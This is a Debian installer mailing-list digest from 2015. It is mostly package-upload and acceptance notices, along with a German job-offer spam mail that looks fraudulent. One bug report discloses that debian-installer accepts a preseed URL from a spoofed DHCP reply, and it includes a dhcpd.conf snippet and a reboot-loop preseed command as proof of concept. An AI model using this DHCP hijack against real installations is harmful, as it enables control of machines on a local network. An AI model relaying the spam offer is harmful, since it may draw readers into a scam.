Processing of anna_1.53_i386.changes
anna_1.53_i386.changes uploaded successfully to ftp-master.debian.org along with the files: anna_1.53.dsc anna_1.53.tar.xz anna_1.53_i386.udeb Greetings, Your Debian queue daemon (running on host coccia.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z3fjy-0001cy...@coccia.debian.org
Processing of anna_1.53_i386.changes
anna_1.53_i386.changes uploaded successfully to localhost along with the files: anna_1.53.dsc anna_1.53.tar.xz anna_1.53_i386.udeb Greetings, Your Debian queue daemon (running on host franck.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z3fkl-0008qk...@franck.debian.org
anna_1.53_i386.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sat, 13 Jun 2015 07:45:28 +0200 Source: anna Binary: anna Architecture: source i386 Version: 1.53 Distribution: unstable Urgency: medium Maintainer: Debian Install System Team Changed-By: Christian Perrier Description: anna - anna's not nearly apt, but for the Debian installer, it will do (udeb) Changes: anna (1.53) unstable; urgency=medium . [ Updated translations ] * Turkish (tr.po) by Mert Dirik Checksums-Sha1: 6e134c30a2e97e6cb9b101e3ac16e7db5c248fd6 1646 anna_1.53.dsc 646b2b056081a27e42a87dce550a9c699ceb2f14 88804 anna_1.53.tar.xz c95de28f6f378f6788deb1e2c18cee1f6aad4bb0 76294 anna_1.53_i386.udeb Checksums-Sha256: 6bb085b591ffdb9918c9af002052bc3a52185ebdaf47641d08ab82543e43b70f 1646 anna_1.53.dsc d8af737735dd1bc334590f3b837f741570ed7b1162fb01b652eb00436ee5094a 88804 anna_1.53.tar.xz 192e5c98b78b281fd2289e8cae443b3cc76782912e2763e5194b7e7f54b47160 76294 anna_1.53_i386.udeb Files: 4324c212a2c41244c557ee2b3ae294e4 1646 debian-installer standard anna_1.53.dsc cf2340ec9908ebc4852f2afc14cd60b5 88804 debian-installer standard anna_1.53.tar.xz faa1ea284909a6c96030355f428aa300 76294 debian-installer standard anna_1.53_i386.udeb -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJVe9J9AAoJEIcvcCxNbiWofegQAK3vU3b09zVjm47rWpd2d3hA eGKHnqDm2phgURJqwr3L2JlJz6LC71E8vY+zgY4NDYPSprkoAMxRg7XmuuZPvHxJ FypV+8vgxNjmJ/8xA8711ct9wbmNOCGIPqWau8kqPjB/gRQg+teyBHrMHQi0Gyk4 BK6dAuADN59KrcNSv9PurFDfjqHeYEk9hcko5HbVF7BMhX4qJSsF1XwgZWt3DH2s /zKYWlb7tzYNdGEk6JcyXy4wbJkGYX5UoQaowAwa5+MzMZ/KO9+IFLdrXvpjbAod F8hH5J0T9FOvcYiZzU321mHMpcvbx9z9lOtMy0CjCegCYLe6rDvs5E/PhlSP8nYw fvC7AriVX6u3DVOsBDX8Qu+i/fPmJm7YSWpgHy2G+aT69jYSU7E34ggX0+rCapp9 bPCYGCVCrDmQ+4EWb5Fgnyd8v2uGVX5Jwx35qOezYCWNqfzqb2f0twNsFHpelTeq nLonx3YMibTLrGjOrbbiHOPQ3VwewYOwo7Il2ddshm4EG+U8Wrc0uxSMFBqu6cF6 QnFWGw6yu/4JiR+fglL2bRu+a2jw/12haXC2hoDvu0AGTmw5Ppk5ui5qGK5WrtFx nrbaR5pvGuK6Enum7kWSJVWIRyHCAUiwQW0Jdr0V0wD4ciw/qJxdPeRfAaHTmtgr ATZL9jocoYItqxv07tLi =zOtU -END PGP SIGNATURE- Thank you for your contribution to Debian. -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z3fup-tv...@franck.debian.org
Bug#788634: debian-installer: Accepting a preseed URL from DHCP allows attacker to hijack installation
Package: debian-installer Severity: important Tags: d-i, security Dear Maintainer, I emailed the following to debian-security and was advised to open a public bug for it. Debian-installer will accept a preseed URL provided via a DHCP option, even when installed from CD-ROM. No authentication of this parameter can be performed, and the user is not prompted before it is accepted due to the nature of preseeding. Due to this, an attacker on the local network can spoof a DHCP responce pointing to their own preseed file, which can do all sorts of mischief (such as adding users or executing commands). An example: in dhcpd.conf: if substring(option vendor-class-identifier, 0, 3 = "d-i" { filename "http://192.168.1.1/preseed.txt"; } and in /var/www/preseed.txt: d-i preseed/early_command string reboot which will send the client into a reboot loop. I'm not sure of the best way to mitigate this, without annoying people who use this feature. Perhaps a kernel commandline arg to specifically enable preseed via DHCP is a good idea? I understand that one expected use case is for an administrator to specify an apt mirror via DHCP preseed, so that even users installing from their own CD/DVD will pick it up, which would break in this scenario. -- System Information: Debian Release: wheezy/sid APT prefers precise-updates APT policy: (500, 'precise-updates'), (500, 'precise-security'), (500, 'precise'), (100, 'precise-backports') Architecture: amd64 (x86_64) Kernel: Linux 3.11.0-15-generic (SMP w/1 CPU core) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20150613153204.4691.9918.reportbug@ubuntu
Bug#788634: debian-installer: Accepting a preseed URL from DHCP allows attacker to hijack installation
On Sat, Jun 13, 2015 at 04:32:04PM +0100, Aliz Hammond wrote: > > Due to this, an attacker on the local network can spoof a DHCP responce > pointing to their own preseed file, which can do all sorts of mischief > (such as adding users or executing commands). So the actual problem is that the local network is compromised. > I'm not sure of the best way to mitigate this, without annoying people > who use this feature. Perhaps a kernel commandline arg to specifically > enable preseed via DHCP is a good idea? A good idea is getting the local network to a state where it can be trusted to use DHCP at all. Groeten Geert Stappers Who considered control: tag -1 wontfix -- Leven en laten leven signature.asc Description: Digital signature
Bug#788634: debian-installer: Accepting a preseed URL from DHCP allows attacker to hijack installation
Geert Stappers (2015-06-13): > On Sat, Jun 13, 2015 at 04:32:04PM +0100, Aliz Hammond wrote: > > > > Due to this, an attacker on the local network can spoof a DHCP responce > > pointing to their own preseed file, which can do all sorts of mischief > > (such as adding users or executing commands). > > So the actual problem is that the local network is compromised. > > > > I'm not sure of the best way to mitigate this, without annoying people > > who use this feature. Perhaps a kernel commandline arg to specifically > > enable preseed via DHCP is a good idea? > > A good idea is getting the local network > to a state where it can be trusted to use DHCP at all. > > > Groeten > Geert Stappers > Who considered > control: tag -1 wontfix I don't think handwaving and tagging wontfix is the right play here. Mraw, KiBi. signature.asc Description: Digital signature
Bug#264903: Arbeitsangebot für 2015
Guten Tag 264903, die Arbeitsagentur stellt Ihnen folgende attraktive Arbeitsstelle in einem erfolgreichen Team im Home Office Bereich vor, ohne Fahrtkosten, ohne Anfahrt, ohne Verkehrsstress. Wir bieten qualifizierte und moderne Stellen nicht nur in der Stadt, sondern auch in ländlichen Regionen europaweit und bieten dabei brilliante Qualität für unsere Auftraggeber. Ab sofort suchen wir: Mitarbeiter (m/w) für den Support im Home Office im Bereich Telekommunikation und Büroarbeit Wir bieten Ihnen einen Job in Festanstellung oder als Freiberufler mit einem Stundenlohn von 20 € pro Stunde in selbständigen Arbeitsweise und einer familienfreunflichen Beschäftigungsform, sowie eine abwechslungsreiche Tätigkeit ohne Fahrzeit mit flexiblen Arbeitszeiten. Es werden keine fachlichen Kenntnisse vorausgesetzt. Die Einarbeitung findet schrittweise durch professionelle Kollegen statt. Die benötigte technische Ausstattung stellen wir Ihnen ohne zusätzlichen Kosten zur Verfügung. Die Stelle kann gern nebenberuflich aufgenommen werden, sowie von Rentnern und Hausfrauen. Wir erwarten: - Unproblematischer Umgang mit E-mail, PC und Internet - Deutsch fließend, Fremdsprachen wären vorteilhaft - Zielstrebigkeit und Pünktlichkeit Ihre Tätigkeitsschwerpunkte sind: - Unterlagen engegennehmen, überarbeiten und weiterleiten - Dokumente kopieren/einscannen - Mails bearbeiten - Arbeit im Home Office in freier Zeiteinteilung - Arbeit mit zur Verfügung gestellten Büroausstattungen Sie sind offen für flexible Tätigkeit und die Arbeit im Home-office? Möchten Sie sich dieser interessanten und herausfordernden neuen Aufgabe stellen? Dann senden Sie uns Ihre Bewerbung an: ladegel1...@australiamail.com Wir freuen uns auf Ihre Bewerbung, Ihre persönlichen Daten behandeln wir selbstverständlich vertraulich. Mit freundlichen Grüßen Hahn AG -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/0f6e7b57.2f48c5cf6cc883e6@KB029
Processing of apt-setup_0.100_i386.changes
apt-setup_0.100_i386.changes uploaded successfully to ftp-master.debian.org along with the files: apt-setup_0.100.dsc apt-setup_0.100.tar.xz apt-cdrom-setup_0.100_all.udeb apt-mirror-setup_0.100_all.udeb apt-setup-udeb_0.100_i386.udeb Greetings, Your Debian queue daemon (running on host coccia.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40z8-0006fk...@coccia.debian.org
Processing of apt-setup_0.100_i386.changes
apt-setup_0.100_i386.changes uploaded successfully to localhost along with the files: apt-setup_0.100.dsc apt-setup_0.100.tar.xz apt-cdrom-setup_0.100_all.udeb apt-mirror-setup_0.100_all.udeb apt-setup-udeb_0.100_i386.udeb Greetings, Your Debian queue daemon (running on host franck.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40ci-0005rl...@franck.debian.org
Processing of arcboot-installer_1.26_mips.changes
arcboot-installer_1.26_mips.changes uploaded successfully to ftp-master.debian.org along with the files: arcboot-installer_1.26.dsc arcboot-installer_1.26.tar.xz arcboot-installer_1.26_mips.udeb Greetings, Your Debian queue daemon (running on host coccia.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40e2-0006ps...@coccia.debian.org
Processing of base-installer_1.156_i386.changes
base-installer_1.156_i386.changes uploaded successfully to ftp-master.debian.org along with the files: base-installer_1.156.dsc base-installer_1.156.tar.xz base-installer_1.156_all.udeb bootstrap-base_1.156_i386.udeb Greetings, Your Debian queue daemon (running on host coccia.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40ix-0006dl...@coccia.debian.org
Processing of arcboot-installer_1.26_mips.changes
arcboot-installer_1.26_mips.changes uploaded successfully to localhost along with the files: arcboot-installer_1.26.dsc arcboot-installer_1.26.tar.xz arcboot-installer_1.26_mips.udeb Greetings, Your Debian queue daemon (running on host franck.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40h8-0005m1...@franck.debian.org
apt-setup_0.100_i386.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sat, 13 Jun 2015 08:50:09 +0200 Source: apt-setup Binary: apt-setup-udeb apt-mirror-setup apt-cdrom-setup Architecture: source all i386 Version: 1:0.100 Distribution: unstable Urgency: medium Maintainer: Debian Install System Team Changed-By: Christian Perrier Description: apt-cdrom-setup - set up a CD in sources.list (udeb) apt-mirror-setup - set up a mirror in sources.list (udeb) apt-setup-udeb - Configure apt (udeb) Changes: apt-setup (1:0.100) unstable; urgency=medium . [ Updated translations ] * Portuguese (Brazil) (pt_BR.po) by Adriano Rafael Gomes * Turkish (tr.po) by Mert Dirik Checksums-Sha1: fe5f77376e33452483ba03b2920d9f3f11320a9a 1772 apt-setup_0.100.dsc 7e774746127fab173a30a5cf77de9dd89cc7a318 242860 apt-setup_0.100.tar.xz a63b071225db6b770aee701085e1352687e5593d 97226 apt-cdrom-setup_0.100_all.udeb cd51c495c1eef91385e76b7737684320869f6e22 73640 apt-mirror-setup_0.100_all.udeb 9b9a550e6f3da1bfb3f269451186bed8d3027943 72990 apt-setup-udeb_0.100_i386.udeb Checksums-Sha256: 7989a1cb8525f80cb52629751e06d26460cefd9af24cdefee5c239ca4546708e 1772 apt-setup_0.100.dsc f893d6fba5e538d029d28ded9222b0fcaab732a1bb6818af68b33cab5417fec6 242860 apt-setup_0.100.tar.xz bb953c74ca95c50c45ad8f1ea0fe8d7579a7541dbebeb22c4e2f87c6086f4a1e 97226 apt-cdrom-setup_0.100_all.udeb 5b42ff83aacff0f2aa364a7f1f6715fdd91bd88f62a938d0402fc9f008a2941e 73640 apt-mirror-setup_0.100_all.udeb 4fc79cbd53a9350faaedefbf0f5b983ce60b6c2f8e636e068c2722993df52fda 72990 apt-setup-udeb_0.100_i386.udeb Files: 1c9b785b6ab66c8c47487bb34904eba7 1772 debian-installer extra apt-setup_0.100.dsc d456bbadc98fe0b55d92c7e50a6a5c1f 242860 debian-installer extra apt-setup_0.100.tar.xz 81e8958ff057152cb79755ca25920bea 97226 debian-installer extra apt-cdrom-setup_0.100_all.udeb 0be4dbe019df9fb8f173cbd0ef7011ce 73640 debian-installer extra apt-mirror-setup_0.100_all.udeb 2db08edb0f1c0784430cd97e3322fcbf 72990 debian-installer standard apt-setup-udeb_0.100_i386.udeb -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJVfRGXAAoJEIcvcCxNbiWoP3YP/0azm7jYP1p9NL8lQg5dUszR RAnFtloyN+XJePl5KT/Zz2g2tai8429YEY4ccQOkt+fZGwY9QwGS4xsVBFfQkP6k nIhSK/IZNpHDvRiHH47biJsG1iyHz4NPhZlwHQIw7ylT54KxFHw2Qc1K/4PvW/uZ Pl3OkA5jWaCz+R3foRF/+1nI92iDeFzf+lE7WkRQ0mdDbTF5kk9msbuDiiY3NzxO KY6l0sGaE0nF/8a7Gjf4UmS3uVk3m8h4q1N1p1gHMK/SFph3LYssynavA8pofy0b 6HTuiTrjrxiS9HsE7KEIPyh9S9FhrelYj8YZrQP7Tq/ddUaMbednLYCld/Vjwzsb ZAD4J9KNRXYNa5X5gJvKA5n3SnhnlzLleri1lIAc3Mk8tP+WNIbm6Ekhr+TKFZJz HYmNCykibp35uWmyays8HX0swsdEujhTai4UoGzXlDunQEodECizBJnkyQuM/b+c W+zdHpXmWxHnwTk+UwxghIAkG8ol8r3MxyLoTwgGOWF3ugW5W1T0V98kThLKm9Lm UqehFsIKQRtTpJ3GHUdnuyuAbENKb4ohBzWC5SliI7A0pEiuktzvavYygct+gHLu hxvQWiBLFPYuSucRTWBt7MxCSPWTaQWm1DlZs4qNj4CEJsyZ2korDLLNrz6LE9Jk Ljn2AZJRn3ym3lcBFH8/ =8D7R -END PGP SIGNATURE- Thank you for your contribution to Debian. -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40mr-0006l7...@franck.debian.org
Processing of base-installer_1.156_i386.changes
base-installer_1.156_i386.changes uploaded successfully to localhost along with the files: base-installer_1.156.dsc base-installer_1.156.tar.xz base-installer_1.156_all.udeb bootstrap-base_1.156_i386.udeb Greetings, Your Debian queue daemon (running on host franck.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40m1-0006dp...@franck.debian.org
arcboot-installer_1.26_mips.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sun, 14 Jun 2015 07:32:35 +0200 Source: arcboot-installer Binary: arcboot-installer Architecture: source mips Version: 1.26 Distribution: unstable Urgency: medium Maintainer: Debian Install System Team Changed-By: Christian Perrier Description: arcboot-installer - Install Arcboot on a hard disk (udeb) Changes: arcboot-installer (1.26) unstable; urgency=medium . [ Updated translations ] * Turkish (tr.po) by Mert Dirik Checksums-Sha1: 01aae79f040b38e3e17bfc4a8a71b86f897919c6 1650 arcboot-installer_1.26.dsc 763eb7659ad4648f77883c6e3f4c4dbf965fae89 70308 arcboot-installer_1.26.tar.xz 0230f1d238c802c29ab0fbd0bc93b6df8c991c92 0 arcboot-installer_1.26_mips.udeb Checksums-Sha256: 3161e9d1c459a10cc32e790007dadcb9eecbd9fdebd0c0da4b0a1876add2713b 1650 arcboot-installer_1.26.dsc e5244399af4b6fb71eb5a8735304490d1227b242df0712f13b8009ed98cf14dc 70308 arcboot-installer_1.26.tar.xz cd2ac9798449c58688d62e2d5da2e7227af2f5d9fadc019c8f3f31ed84c0a2ba 0 arcboot-installer_1.26_mips.udeb Files: b29aa3c404d1006ee6ad0b59a5c8a6f1 1650 debian-installer standard arcboot-installer_1.26.dsc 5b67c8974b5dd875df1be28f120d04f5 70308 debian-installer standard arcboot-installer_1.26.tar.xz b6e170336595a97544b4c96e1ba7b9fc 0 debian-installer standard arcboot-installer_1.26_mips.udeb -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJVfRLhAAoJEIcvcCxNbiWo4MMP/juQiMxIIUDlnUIV+jAMShGK pU5yd85ow9wBGpp/0+VbywJ/+qlrBrtMXhjFjVFf3dJgvw7KLgEmxZRqBR2l4znS 6+VO+LLigti2or995xWIBw5uXpbWT6ff1KLj/yskjLFz+ViuMHYTZExbcm9map9M 9Ggp3A6QbIyyw5ov5AtDqBk5pJQltTOfpg/u3thSPqvFLVtaL9ugNNXOWCZnYJFW jqTC1LxYgpxVzpT3GW8kdEOYMc+O2yCaeudwALIY/L7+YTOwFp6g/iwN/wzshKZF d9zMXZcjQsct864ZwL8sv41Ij8HGiRb10lsJOkL5wMJX1qTtLj8J5HBqiZpeHWk3 97OemIiQYLwav2ozVA33h3H2jFMlpVefzY1pPDJhQLvrvangobJ131gJdl0V3x35 koKWpt1qffFEs6PmhED/X92T86q0dHiud0Vu/pMqLA1g5quZHPDEAbeC+Idb4jfI 6EOk59tIoGKm8sf5BGknalDsxsECrji7anJFfVBcAHo/1JMY/gnS7S3JEOkgleT/ DgG33h6o/2VV0q1JwrDE3pQ3480n3yyJmFi+3EpceO9VlNofB4DV2YBRnsyLBnrW wV7XO+1viEII2cjBulzpeVPkA8yY2IRpgahGRfV+K5JMN4V0Wgl7xSDDxVXtTP7v 6sUxTqzEAo/+kursp8aM =gDB4 -END PGP SIGNATURE- Thank you for your contribution to Debian. -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40mw-0006mc...@franck.debian.org
base-installer_1.156_i386.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sun, 14 Jun 2015 07:38:50 +0200 Source: base-installer Binary: base-installer bootstrap-base Architecture: source all i386 Version: 1.156 Distribution: unstable Urgency: medium Maintainer: Debian Install System Team Changed-By: Christian Perrier Description: base-installer - base system installation framework (udeb) bootstrap-base - Install the base system (udeb) Changes: base-installer (1.156) unstable; urgency=medium . [ Updated translations ] * Turkish (tr.po) by Mert Dirik Checksums-Sha1: c5ce2a589c4b24024bbb5f0c50690f56178430e0 1897 base-installer_1.156.dsc 42bedc233ee1061f15ff002c6ded375d7f613bf0 253336 base-installer_1.156.tar.xz e3ba3b90b950ef8b803e365965344a249706dce2 47184 base-installer_1.156_all.udeb a6706761ed8097fde74c60a597e012d09bb0761e 193522 bootstrap-base_1.156_i386.udeb Checksums-Sha256: 2c95bf03915a5881bac6aaad59665d753c6fa7e67cfb30715232d69cadf2f7ea 1897 base-installer_1.156.dsc 0db14f8ae09c9c729bf7b39a0e5c8fe4a2b115187b54e55b0c4dfcf8152f1e71 253336 base-installer_1.156.tar.xz bbae5ec9e8e39b43e9c389c24311b976f99639060d383bf6d1213644a13dbf69 47184 base-installer_1.156_all.udeb 75f2a7f469eb56664abb2bd4e9c328f1b57f024c77ececf2316339be846756ad 193522 bootstrap-base_1.156_i386.udeb Files: 448c9faebe2975e8f67493b74834060d 1897 debian-installer required base-installer_1.156.dsc 95f8a32672ddb884cb4c153a73b30218 253336 debian-installer required base-installer_1.156.tar.xz bca70a67cd918a105d7ffe8b9c438ea8 47184 debian-installer required base-installer_1.156_all.udeb 043caeb3c4b6107598e52034cdbb76be 193522 debian-installer required bootstrap-base_1.156_i386.udeb -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJVfRPvAAoJEIcvcCxNbiWo+bcP/2IsCnZnrFPbIlwec9dd7+3y 5qYN/sYe4JHAMIR832yEJieatEJ8v2GpYTRgi9PH/agRFY90ZF6P9jzdhEjYgkbL cnydGpfqYrt/4FGRRad2bTazQXpO673ANRPMWH60gnb0qedrpXwrb3Ib0lsU9HF4 ITAlyeckgiTWq6p39rnk+hEov3buJ5W0NKR0ubiwVa8EQcJiyOrPyL2Ai5Vp7Jvq U9kXKuTKZg7HORf4Qumowela4B+HbrpDGsW0Ck3vFEAQGIWu1x4D+AhFghmRhAX6 FiMqVLwdsdOz+XnJyBWV3hK897YUv5KKgyqUCMkpAZIL3PEMCJDuFDhRW9s0IlTx azGKkNS1W2SI59HKt61IS+ajBTYoy7XDVpojjRgPRuDH74J6qlSskJql75cK71wM pVtEySydup34nd3rfx0ZdetE66SvpOcjoJctzPcVf2wvZWldg8g72lA0IgXxW5kV EjYc1CWvIhnwja2l4qBuVIDIMuv/SkLd16Vx3r4wBzkxNdceR8FDNs5Pzgmb/OrD CpDGgVkxbCpNIDWi5FHV1GhJ31RDzwnRq8k1tqZZjv+69233mf+YNGE5GJ1EZelS UIg0Es4QZkJUi5qtPorcC3lTUhSS8G2eiGl30io4xe3GwkFiwimrPhANlEeLYf/G 9wmNObKvEDYlB9J1G1Id =UL/N -END PGP SIGNATURE- Thank you for your contribution to Debian. -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z40n2-0006pk...@franck.debian.org
Bug#788357: marked as done (tzsetup-udeb: Missing SAMT(MSK+1) in timezone menu for Russia)
Your message dated Sun, 14 Jun 2015 06:19:31 + with message-id and subject line Bug#788357: fixed in tzsetup 1:0.70 has caused the Debian Bug report #788357, regarding tzsetup-udeb: Missing SAMT(MSK+1) in timezone menu for Russia to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 788357: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=788357 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: tzsetup-udeb Severity: normal Tags: d-i Dear Maintainer, Quoting /usr/share/zoneinfo/zone.tab, >RU +5312+05009 Europe/Samara Moscow+00 (Moscow+01 after 2014-10-26) >- Samara, Udmurtia Since 2014-10-26 has already came and Samara now uses new SAMT (MSK+1) timezone, it may be useful to review debian/common.templates and add another choice to the tzsetup/country/RU template (Choices-C += Europe/Samara and __Choices += Moscow+01 - Samara). Best regards, Ivan -- System Information: Debian Release: 7.8 APT prefers oldoldstable APT policy: (500, 'oldoldstable'), (500, 'stable'), (500, 'oldstable') Architecture: i386 (i686) Kernel: Linux 3.2.0-4-686-pae (SMP w/2 CPU cores) Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash --- End Message --- --- Begin Message --- Source: tzsetup Source-Version: 1:0.70 We believe that the bug you reported is fixed in the latest version of tzsetup, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 788...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Christian Perrier (supplier of updated tzsetup package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sun, 14 Jun 2015 07:47:30 +0200 Source: tzsetup Binary: tzsetup-udeb Architecture: source all Version: 1:0.70 Distribution: unstable Urgency: medium Maintainer: Debian Install System Team Changed-By: Christian Perrier Description: tzsetup-udeb - choose time zone (udeb) Closes: 788357 Changes: tzsetup (1:0.70) unstable; urgency=medium . * Add Europe/Samara to choices for timezones in Russia. Closes: #788357 . [ Updated translations ] * Portuguese (Brazil) (pt_BR.po) by Adriano Rafael Gomes * Turkish (tr.po) by Mert Dirik Checksums-Sha1: 65c41ad354b8faddeeb37adf6fcd7e90163820d4 1658 tzsetup_0.70.dsc b8ea877914c5b37da2932fc9efa5a3ccb9c787ce 108480 tzsetup_0.70.tar.xz 4f0d251122b11306806c20c5c8f65002ad0ab917 76494 tzsetup-udeb_0.70_all.udeb Checksums-Sha256: 64bbc137520a7fbdc9266bf9f94194c826561bea4806c9efda12b3b00cbe8219 1658 tzsetup_0.70.dsc 279122f8ab9b22e1fcf0a3aa13d5b1ad5ef44f6c4aff3c0a5ddbb4c50e7815dc 108480 tzsetup_0.70.tar.xz 195444000f76152b60be188b8973b8c40fa52208636907eed09f4464635e5cfc 76494 tzsetup-udeb_0.70_all.udeb Files: b277ce2a145862410e759ba981687d1e 1658 debian-installer optional tzsetup_0.70.dsc 433f9a978de58c821e92415d1d9ffd02 108480 debian-installer optional tzsetup_0.70.tar.xz b75fd78065cdf4b38c3c886aa4b3ef21 76494 debian-installer optional tzsetup-udeb_0.70_all.udeb -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJVfRi5AAoJEIcvcCxNbiWod/UP/2Nq1plHVhSrkSteDXD1wxI+ hEITq7pQ/9AYYCwOYtga0zC9orb3TiiEq+iIfmHScM87SRSBDg8f+Unai/HVSfdB o7vsRQkncIWTMRMSHOWVaR46dsaEq1fFcOArNBhT5GLV6KaCvj501CuaIKmolo4+ xsmAeGY5Xyrbng+vXMUyrarD2WlYhfpdkkZj8goMN/XFBJ5cJpzs69TbZ6dto3xR NqqkKouASUr1cXCcVqnbqycdD5xUUj0P8zoVSdDAHOi4bqjYvvAebqu3zDukfu6t ceSZexpO721m07bdk/ppidcCrAHY8GpOp3EWzSwB4aR7NQqfh1wtnW494dkQExxh EfsW0wMjMOLiZFbMs0t/dZwOYv/kZNRxHYDoxskHpWi2ek46YLpkh7I06AcCd5id 14YKF9C5ASGjfGspI1HyVUFU0QNJswunHiFLNfr82unt6ILHCHOhtKRkEKw9SbAP W56vbUuAo4ucgkpim7XRIqNeoDDl40y4cR+7KmXo4DVnUQyADE+EOOku1EctlgF0 ZnB3vOl0CppeFnq43ozUaavsN7rFAKe17ocF+srmV7SLZpS3hIfIiiJC3BUfFZ+N 6QOrdOjgOJhJl+mjPNPdm02GbI3ve0SBvOtUtKV3/ngtRTmSnIPOZ5pvq+QiC/iY uULOmxtddxs//6gDBJDj =28iA -END PGP SIGNATURE End Message ---
Processing of tzsetup_0.70_i386.changes
tzsetup_0.70_i386.changes uploaded successfully to ftp-master.debian.org along with the files: tzsetup_0.70.dsc tzsetup_0.70.tar.xz tzsetup-udeb_0.70_all.udeb Greetings, Your Debian queue daemon (running on host coccia.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z412n-0007qc...@coccia.debian.org
Processing of tzsetup_0.70_i386.changes
tzsetup_0.70_i386.changes uploaded successfully to localhost along with the files: tzsetup_0.70.dsc tzsetup_0.70.tar.xz tzsetup-udeb_0.70_all.udeb Greetings, Your Debian queue daemon (running on host franck.debian.org) -- To UNSUBSCRIBE, email to debian-boot-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/e1z415o-lp...@franck.debian.org
tzsetup_0.70_i386.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sun, 14 Jun 2015 07:47:30 +0200 Source: tzsetup Binary: tzsetup-udeb Architecture: source all Version: 1:0.70 Distribution: unstable Urgency: medium Maintainer: Debian Install System Team Changed-By: Christian Perrier Description: tzsetup-udeb - choose time zone (udeb) Closes: 788357 Changes: tzsetup (1:0.70) unstable; urgency=medium . * Add Europe/Samara to choices for timezones in Russia. Closes: #788357 . [ Updated translations ] * Portuguese (Brazil) (pt_BR.po) by Adriano Rafael Gomes * Turkish (tr.po) by Mert Dirik Checksums-Sha1: 65c41ad354b8faddeeb37adf6fcd7e90163820d4 1658 tzsetup_0.70.dsc b8ea877914c5b37da2932fc9efa5a3ccb9c787ce 108480 tzsetup_0.70.tar.xz 4f0d251122b11306806c20c5c8f65002ad0ab917 76494 tzsetup-udeb_0.70_all.udeb Checksums-Sha256: 64bbc137520a7fbdc9266bf9f94194c826561bea4806c9efda12b3b00cbe8219 1658 tzsetup_0.70.dsc 279122f8ab9b22e1fcf0a3aa13d5b1ad5ef44f6c4aff3c0a5ddbb4c50e7815dc 108480 tzsetup_0.70.tar.xz 